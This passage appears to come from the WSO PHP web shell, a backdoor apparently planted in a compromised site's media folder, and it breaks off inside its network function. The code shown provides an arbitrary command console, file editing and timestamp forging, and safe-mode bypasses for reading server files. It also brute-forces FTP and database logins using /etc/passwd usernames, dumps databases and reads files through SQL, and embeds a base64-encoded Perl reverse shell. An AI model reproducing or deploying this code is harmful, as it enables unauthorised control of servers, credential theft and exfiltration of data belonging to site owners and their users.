1215if( !file_exists(@$_POST['p1']) ) {
1216echo 'File not exists';
1217wsoFooter();
1218return;
1219}
1220$uid = @posix_getpwuid(@fileowner($_POST['p1']));
1221if(!$uid) {
1222$uid['name'] = @fileowner($_POST['p1']);
1223$gid['name'] = @filegroup($_POST['p1']);
1224}else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1225echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1226echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1227if( empty($_POST['p2']) )
1228$_POST['p2'] = 'view';
1229if( is_file($_POST['p1']) )
1230$m = array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');
1231else
1232$m = array('Chmod','Rename','Touch');
1233foreach($m as $v)
1234echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1235echo '<br><br>';
1236switch($_POST['p2']) {
1237case 'view':
1238echo '<pre class=ml1>';
1239$fp = @fopen($_POST['p1'],'r');
1240if($fp) {
1241while( !@feof($fp) )
1242echo htmlspecialchars(@fread($fp,1024));
1243@fclose($fp);
1244}
1245echo '</pre>';
1246break;
1247case 'highlight':
1248if( @is_readable($_POST['p1']) ) {
1249echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1250$code = @highlight_file($_POST['p1'],true);
1251echo str_replace(array('<span ','</span>'),array('<font ','</font>'),$code).'</div>';
1252}
1253break;
1254case 'chmod':
1255if( !empty($_POST['p3']) ) {
1256$perms = 0;
1257for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1258$perms += (int)$_POST['p3'][$i]*pow(8,(strlen($_POST['p3'])-$i-1));
1259if(!@chmod($_POST['p1'],$perms))
1260echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1261}
1262clearstatcache();
1263echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o',fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1264break;
1265case 'edit':
1266if( !is_writable($_POST['p1'])) {
1267echo 'File isn\'t writeable';
1268break;
1269}
1270if( !empty($_POST['p3']) ) {
1271$time = @filemtime($_POST['p1']);
1272$_POST['p3'] = substr($_POST['p3'],1);
1273$fp = @fopen($_POST['p1'],"w");
1274if($fp) {
1275@fwrite($fp,$_POST['p3']);
1276@fclose($fp);
1277echo 'Saved!<br><script>p3_="";</script>';
1278@touch($_POST['p1'],$time,$time);
1279}
1280}
1281echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1282$fp = @fopen($_POST['p1'],'r');
1283if($fp) {
1284while( !@feof($fp) )
1285echo htmlspecialchars(@fread($fp,1024));
1286@fclose($fp);
1287}
1288echo '</textarea><input type=submit value=">>"></form>';
1289break;
1290case 'hexdump':
1291$c = @file_get_contents($_POST['p1']);
1292$n = 0;
1293$h = array('00000000<br>','','');
1294$len = strlen($c);
1295for ($i=0;$i<$len;++$i) {
1296$h[1] .= sprintf('%02X',ord($c[$i])).' ';
1297switch ( ord($c[$i]) ) {
1298case 0: $h[2] .= ' ';break;
1299case 9: $h[2] .= ' ';break;
1300case 10: $h[2] .= ' ';break;
1301case 13: $h[2] .= ' ';break;
1302default: $h[2] .= $c[$i];break;
1303}
1304$n++;
1305if ($n == 32) {
1306$n = 0;
1307if ($i+1 <$len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1308$h[1] .= '<br>';
1309$h[2] .= "\n";
1310}
1311}
1312echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1313break;
1314case 'rename':
1315if( !empty($_POST['p3']) ) {
1316if(!@rename($_POST['p1'],$_POST['p3']))
1317echo 'Can\'t rename!<br>';
1318else
1319die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1320}
1321echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1322break;
1323case 'touch':
1324if( !empty($_POST['p3']) ) {
1325$time = strtotime($_POST['p3']);
1326if($time) {
1327if(!touch($_POST['p1'],$time,$time))
1328echo 'Fail!';
1329else
1330echo 'Touched!';
1331}else echo 'Bad time format!';
1332}
1333clearstatcache();
1334echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s",@filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1335break;
1336}
1337echo '</div>';
1338wsoFooter();
1339}
1340function actionSafeMode() {
1341$temp='';
1342ob_start();
1343switch($_POST['p1']) {
1344case 1:
1345$temp=@tempnam($test,'cx');
1346if(@copy("compress.zlib://".$_POST['p2'],$temp)){
1347echo @file_get_contents($temp);
1348unlink($temp);
1349}else
1350echo 'Sorry... Can\'t open file';
1351break;
1352case 2:
1353$files = glob($_POST['p2'].'*');
1354if( is_array($files) )
1355foreach ($files as $filename)
1356echo $filename."\n";
1357break;
1358case 3:
1359$ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!','','/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt'));
1360curl_exec($ch);
1361break;
1362case 4:
1363ini_restore("safe_mode");
1364ini_restore("open_basedir");
1365include($_POST['p2']);
1366break;
1367case 5:
1368for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1369$uid = @posix_getpwuid($_POST['p2']);
1370if ($uid)
1371echo join(':',$uid)."\n";
1372}
1373break;
1374}
1375$temp = ob_get_clean();
1376wsoHeader();
1377echo '<h1>Safe mode bypass</h1><div class=content>';
1378echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1379if($temp)
1380echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
1381echo '</div>';
1382wsoFooter();
1383}
1384function actionConsole() {
1385if(!empty($_POST['p1']) &&!empty($_POST['p2'])) {
1386$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
1387$_POST['p1'] .= ' 2>&1';
1388}elseif(!empty($_POST['p1']))
1389$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
1390if(isset($_POST['ajax'])) {
1391$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1392ob_start();
1393echo "d.cf.cmd.value='';\n";
1394$temp = @iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
1395if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1396if(@chdir($match[1])) {
1397$GLOBALS['cwd'] = @getcwd();
1398echo "c_='".$GLOBALS['cwd']."';";
1399}
1400}
1401echo "d.cf.output.value+='".$temp."';";
1402echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1403$temp = ob_get_clean();
1404echo strlen($temp),"\n",$temp;
1405exit;
1406}
1407wsoHeader();
1408echo "<script>
1409if(window.Event) window.captureEvents(Event.KEYDOWN);
1410var cmds = new Array('');
1411var cur = 0;
1412function kp(e) {
1413 var n = (window.Event) ? e.which : e.keyCode;
1414 if(n == 38) {
1415 cur--;
1416 if(cur>=0)
1417 document.cf.cmd.value = cmds[cur];
1418 else
1419 cur++;
1420 } else if(n == 40) {
1421 cur++;
1422 if(cur < cmds.length)
1423 document.cf.cmd.value = cmds[cur];
1424 else
1425 cur--;
1426 }
1427}
1428function add(cmd) {
1429 cmds.pop();
1430 cmds.push(cmd);
1431 cmds.push('');
1432 cur = cmds.length-1;
1433}
1434
1435</script>";
1436echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1437foreach($GLOBALS['aliases'] as $n =>$v) {
1438if($v == '') {
1439echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1440continue;
1441}
1442echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1443}
1444if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1445$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1446echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1447if(!empty($_POST['p1'])) {
1448echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
1449}
1450echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1451echo '</form></div><script>d.cf.cmd.focus();</script>';
1452wsoFooter();
1453}
1454function actionLogout() {
1455session_destroy();
1456die('bye!');
1457}
1458function actionSelfRemove() {
1459if($_POST['p1'] == 'yes')
1460if(@unlink(preg_replace('!\(\d+\)\s.*!','','/home/k3030889/public_html/media/temp/30b2c088dc63ae3e97ca260cb16a6c68.txt')))
1461die('Shell has been removed');
1462else
1463echo 'unlink error!';
1464if($_POST['p1'] != 'yes')
1465wsoHeader();
1466echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1467wsoFooter();
1468}
1469function actionBruteforce() {
1470wsoHeader();
1471if( isset($_POST['proto']) ) {
1472echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1473if( $_POST['proto'] == 'ftp') {
1474function bruteForce($ip,$port,$login,$pass) {
1475$fp = @ftp_connect($ip,$port?$port:21);
1476if(!$fp) return false;
1477$res = @ftp_login($fp,$login,$pass);
1478@ftp_close($fp);
1479return $res;
1480}
1481}elseif( $_POST['proto'] == 'mysql') {
1482function bruteForce($ip,$port,$login,$pass) {
1483$res = @mysql_connect($ip.':'.$port?$port:3306,$login,$pass);
1484@mysql_close($res);
1485return $res;
1486}
1487}elseif( $_POST['proto'] == 'pgsql') {
1488function bruteForce($ip,$port,$login,$pass) {
1489$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1490$res = @pg_connect($str);
1491@pg_close($res);
1492return $res;
1493}
1494}
1495$success = 0;
1496$attempts = 0;
1497$server = explode(":",$_POST['server']);
1498if($_POST['type'] == 1) {
1499$temp = @file('/etc/passwd');
1500if( is_array($temp) )
1501foreach($temp as $line) {
1502$line = explode(":",$line);
1503++$attempts;
1504if( bruteForce(@$server[0],@$server[1],$line[0],$line[0]) ) {
1505$success++;
1506echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1507}
1508if(@$_POST['reverse']) {
1509$tmp = "";
1510for($i=strlen($line[0])-1;$i>=0;--$i)
1511$tmp .= $line[0][$i];
1512++$attempts;
1513if( bruteForce(@$server[0],@$server[1],$line[0],$tmp) ) {
1514$success++;
1515echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1516}
1517}
1518}
1519}elseif($_POST['type'] == 2) {
1520$temp = @file($_POST['dict']);
1521if( is_array($temp) )
1522foreach($temp as $line) {
1523$line = trim($line);
1524++$attempts;
1525if( bruteForce($server[0],@$server[1],$_POST['login'],$line) ) {
1526$success++;
1527echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1528}
1529}
1530}
1531echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1532}
1533echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1534.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1535.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1536.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1537.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1538.'<span>Server:port</span></td>'
1539.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1540.'<tr><td><span>Brute type</span></td>'
1541.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1542.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1543.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1544.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1545.'<td><input type=text name=login value="root"></td></tr>'
1546.'<tr><td><span>Dictionary</span></td>'
1547.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1548.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1549echo '</div><br>';
1550wsoFooter();
1551}
1552function actionSql() {
1553class DbClass {
1554var $type;
1555var $link;
1556var $res;
1557function DbClass($type) {
1558$this->type = $type;
1559}
1560function connect($host,$user,$pass,$dbname){
1561switch($this->type) {
1562case 'mysql':
1563if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1564break;
1565case 'pgsql':
1566$host = explode(':',$host);
1567if(!$host[1]) $host[1]=5432;
1568if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1569break;
1570}
1571return false;
1572}
1573function selectdb($db) {
1574switch($this->type) {
1575case 'mysql':
1576if (@mysql_select_db($db))return true;
1577break;
1578}
1579return false;
1580}
1581function query($str) {
1582switch($this->type) {
1583case 'mysql':
1584return $this->res = @mysql_query($str);
1585break;
1586case 'pgsql':
1587return $this->res = @pg_query($this->link,$str);
1588break;
1589}
1590return false;
1591}
1592function fetch() {
1593$res = func_num_args()?func_get_arg(0):$this->res;
1594switch($this->type) {
1595case 'mysql':
1596return @mysql_fetch_assoc($res);
1597break;
1598case 'pgsql':
1599return @pg_fetch_assoc($res);
1600break;
1601}
1602return false;
1603}
1604function listDbs() {
1605switch($this->type) {
1606case 'mysql':
1607return $this->query("SHOW databases");
1608break;
1609case 'pgsql':
1610return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1611break;
1612}
1613return false;
1614}
1615function listTables() {
1616switch($this->type) {
1617case 'mysql':
1618return $this->res = $this->query('SHOW TABLES');
1619break;
1620case 'pgsql':
1621return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1622break;
1623}
1624return false;
1625}
1626function error() {
1627switch($this->type) {
1628case 'mysql':
1629return @mysql_error();
1630break;
1631case 'pgsql':
1632return @pg_last_error();
1633break;
1634}
1635return false;
1636}
1637function setCharset($str) {
1638switch($this->type) {
1639case 'mysql':
1640if(function_exists('mysql_set_charset'))
1641return @mysql_set_charset($str,$this->link);
1642else
1643$this->query('SET CHARSET '.$str);
1644break;
1645case 'pgsql':
1646return @pg_set_client_encoding($this->link,$str);
1647break;
1648}
1649return false;
1650}
1651function loadFile($str) {
1652switch($this->type) {
1653case 'mysql':
1654return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1655break;
1656case 'pgsql':
1657$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1658$r=array();
1659while($i=$this->fetch())
1660$r[] = $i['file'];
1661$this->query('drop table wso2');
1662return array('file'=>implode("\n",$r));
1663break;
1664}
1665return false;
1666}
1667function dump($table,$fp = false) {
1668switch($this->type) {
1669case 'mysql':
1670$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1671$create = mysql_fetch_array($res);
1672$sql = $create[1].";\n";
1673if($fp) fwrite($fp,$sql);else echo($sql);
1674$this->query('SELECT * FROM `'.$table.'`');
1675$head = true;
1676while($item = $this->fetch()) {
1677$columns = array();
1678foreach($item as $k=>$v) {
1679if($v == null)
1680$item[$k] = "NULL";
1681elseif(is_numeric($v))
1682$item[$k] = $v;
1683else
1684$item[$k] = "'".@mysql_real_escape_string($v)."'";
1685$columns[] = "`".$k."`";
1686}
1687if($head) {
1688$sql = 'INSERT INTO `'.$table.'` ('.implode(", ",$columns).") VALUES \n\t(".implode(", ",$item).')';
1689$head = false;
1690}else
1691$sql = "\n\t,(".implode(", ",$item).')';
1692if($fp) fwrite($fp,$sql);else echo($sql);
1693}
1694if(!$head)
1695if($fp) fwrite($fp,";\n\n");else echo(";\n\n");
1696break;
1697case 'pgsql':
1698$this->query('SELECT * FROM '.$table);
1699while($item = $this->fetch()) {
1700$columns = array();
1701foreach($item as $k=>$v) {
1702$item[$k] = "'".addslashes($v)."'";
1703$columns[] = $k;
1704}
1705$sql = 'INSERT INTO '.$table.' ('.implode(", ",$columns).') VALUES ('.implode(", ",$item).');'."\n";
1706if($fp) fwrite($fp,$sql);else echo($sql);
1707}
1708break;
1709}
1710return false;
1711}
1712};
1713$db = new DbClass($_POST['type']);
1714if(@$_POST['p2']=='download') {
1715$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);
1716$db->selectdb($_POST['sql_base']);
1717switch($_POST['charset']) {
1718case "Windows-1251": $db->setCharset('cp1251');break;
1719case "UTF-8": $db->setCharset('utf8');break;
1720case "KOI8-R": $db->setCharset('koi8r');break;
1721case "KOI8-U": $db->setCharset('koi8u');break;
1722case "cp866": $db->setCharset('cp866');break;
1723}
1724if(empty($_POST['file'])) {
1725ob_start("ob_gzhandler",4096);
1726header("Content-Disposition: attachment; filename=dump.sql");
1727header("Content-Type: text/plain");
1728foreach($_POST['tbl'] as $v)
1729$db->dump($v);
1730exit;
1731}elseif($fp = @fopen($_POST['file'],'w')) {
1732foreach($_POST['tbl'] as $v)
1733$db->dump($v,$fp);
1734fclose($fp);
1735unset($_POST['p2']);
1736}else
1737die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1738}
1739wsoHeader();
1740echo "
1741
1742<h1>Sql browser</h1><div class=content>
1743<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1744<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1745<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'') ."'>
1746<td><select name='type'><option value='mysql' ";
1747if(@$_POST['type']=='mysql')echo 'selected';
1748echo ">MySql</option><option value='pgsql' ";
1749if(@$_POST['type']=='pgsql')echo 'selected';
1750echo ">PostgreSql</option></select></td>
1751<td><input type=text name=sql_host value='".(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1752<td><input type=text name=sql_login value='".(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1753<td><input type=text name=sql_pass value='".(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1754$tmp = "<input type=text name=sql_base value=''>";
1755if(isset($_POST['sql_host'])){
1756if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])) {
1757switch($_POST['charset']) {
1758case "Windows-1251": $db->setCharset('cp1251');break;
1759case "UTF-8": $db->setCharset('utf8');break;
1760case "KOI8-R": $db->setCharset('koi8r');break;
1761case "KOI8-U": $db->setCharset('koi8u');break;
1762case "cp866": $db->setCharset('cp866');break;
1763}
1764$db->listDbs();
1765echo "<select name=sql_base><option value=''></option>";
1766while($item = $db->fetch()) {
1767list($key,$value) = each($item);
1768echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1769}
1770echo '</select>';
1771}
1772else echo $tmp;
1773}else
1774echo $tmp;
1775echo "</td>
1776
1777 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1778 <td><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked') ."> count the number of rows</td>
1779 </tr>
1780 </table>
1781 <script>
1782 s_db='".@addslashes($_POST['sql_base'])."';
1783 function fs(f) {
1784 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1785 if(f.p1) f.p1.value='';
1786 if(f.p2) f.p2.value='';
1787 if(f.p3) f.p3.value='';
1788 }
1789 }
1790 function st(t,l) {
1791 d.sf.p1.value = 'select';
1792 d.sf.p2.value = t;
1793 if(l && d.sf.p3) d.sf.p3.value = l;
1794 d.sf.submit();
1795 }
1796 function is() {
1797 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1798 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1799 }
1800 </script>";
1801if(isset($db) &&$db->link){
1802echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1803if(!empty($_POST['sql_base'])){
1804$db->selectdb($_POST['sql_base']);
1805echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1806$tbls_res = $db->listTables();
1807while($item = $db->fetch($tbls_res)) {
1808list($key,$value) = each($item);
1809if(!empty($_POST['sql_count']))
1810$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1811$value = htmlspecialchars($value);
1812echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") ."</nobr><br>";
1813}
1814echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1815if(@$_POST['p1'] == 'select') {
1816$_POST['p1'] = 'query';
1817$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1818$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
1819$num = $db->fetch();
1820$pages = ceil($num['n'] / 30);
1821echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2'] ."\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int)$_POST['p3']) .">";
1822echo " of $pages";
1823if($_POST['p3'] >1)
1824echo " <a href=# onclick='st(\"".$_POST['p2'] .'", '.($_POST['p3']-1) .")'>< Prev</a>";
1825if($_POST['p3'] <$pages)
1826echo " <a href=# onclick='st(\"".$_POST['p2'] .'", '.($_POST['p3']+1) .")'>Next ></a>";
1827$_POST['p3']--;
1828if($_POST['type']=='pgsql')
1829$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1830else
1831$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1832echo "<br><br>";
1833}
1834if((@$_POST['p1'] == 'query') &&!empty($_POST['p2'])) {
1835$db->query(@$_POST['p2']);
1836if($db->res !== false) {
1837$title = false;
1838echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1839$line = 1;
1840while($item = $db->fetch()) {
1841if(!$title) {
1842echo '<tr>';
1843foreach($item as $key =>$value)
1844echo '<th>'.$key.'</th>';
1845reset($item);
1846$title=true;
1847echo '</tr><tr>';
1848$line = 2;
1849}
1850echo '<tr class="l'.$line.'">';
1851$line = $line==1?2:1;
1852foreach($item as $key =>$value) {
1853if($value == null)
1854echo '<td><i>null</i></td>';
1855else
1856echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1857}
1858echo '</tr>';
1859}
1860echo '</table>';
1861}else {
1862echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1863}
1864}
1865echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1866if(!empty($_POST['p2']) &&($_POST['p1'] != 'loadfile'))
1867echo htmlspecialchars($_POST['p2']);
1868echo "</textarea><br/><input type=submit value='Execute'>";
1869echo "</td></tr>";
1870}
1871echo "</table></form><br/>";
1872if($_POST['type']=='mysql') {
1873$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1874if($db->fetch())
1875echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1876}
1877if(@$_POST['p1'] == 'loadfile') {
1878$file = $db->loadFile($_POST['p2']);
1879echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1880}
1881}else {
1882echo htmlspecialchars($db->error());
1883}
1884echo '</div>';
1885wsoFooter();
1886}
1887function actionNetwork() {
1888wsoHeader();
1889$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
